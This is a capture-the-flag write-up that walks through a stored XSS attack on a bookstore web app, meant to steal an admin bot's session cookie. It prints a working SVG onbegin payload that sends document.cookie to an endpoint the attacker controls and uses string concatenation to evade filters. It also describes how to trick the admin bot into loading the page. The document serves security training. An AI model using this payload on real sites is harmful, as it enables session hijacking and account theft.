Stealer Web Challenge

Web 500

Description

"Welcome to the Bookstore! We've recently implemented a new feature that allows sellers to add detailed descriptions to their books. Our admin bot regularly checks these descriptions for any inappropriate content or out-of-stock items."

Vulnerability Overview

This challenge featured a classic Cross-Site Scripting (XSS) vulnerability that could be leveraged for session hijacking. The goal was to extract the admin bot's session cookie, which contained the flag.

The vulnerability existed in the book description field, which failed to properly sanitize user input. This allowed injection of JavaScript code that would execute when the admin bot viewed the book details.

Exploitation Strategy

The exploitation process involved several steps to trigger the XSS and extract the admin bot's cookies:

  1. Create a seller account to gain access to book creation functionality
  2. Add a book with a specially crafted XSS payload in the description
  3. Ensure the book would be reviewed by the admin bot
  4. Capture the admin's session when they viewed the malicious description

Step 1: Initial Reconnaissance

After registering for an account, I discovered the application allowed users to:

  • Register as either buyers or sellers
  • Sellers could create book listings with detailed descriptions
  • Buyers could report books that were listed as in stock but actually unavailable
  • An admin bot would review these reports and check the book descriptions

This admin review process presented an opportunity to execute client-side code in the admin's browser context.

Step 2: Crafting the XSS Payload

I created a seller account and added a book with the following XSS payload in the description field:

XSS Payload HTML 
<svg><animate onbegin="location='link?c='+document['coo'+'kie']" attributename=x>

This payload takes advantage of the onbegin event handler in SVG animations, which executes when the animation starts. It sends the document's cookies to a link that I controlled.

The payload uses string concatenation (['coo'+'kie']) to bypass potential simple filters that might block the direct use of "cookie".

Step 3: Triggering Admin Review

To ensure the admin bot would view my malicious book description, I:

  1. Set the book's stock to 0 (zero) to mark it as out of stock
  2. Created a second account as a buyer
  3. Searched for my own book using the buyer account
  4. Reported the book as out of stock through the buyer interface

This triggered the admin review process, where the admin bot would automatically visit the book's page to verify the report.

Step 4: Capturing the Flag

When the admin bot visited the book description page, the SVG animation triggered and executed my JavaScript payload, which sent the admin's cookies to my controlled endpoint.

The request received contained the admin's session cookie, which included the flag. The payload effectively exfiltrated the sensitive information without requiring any further interaction.

Flag

FlagY{******}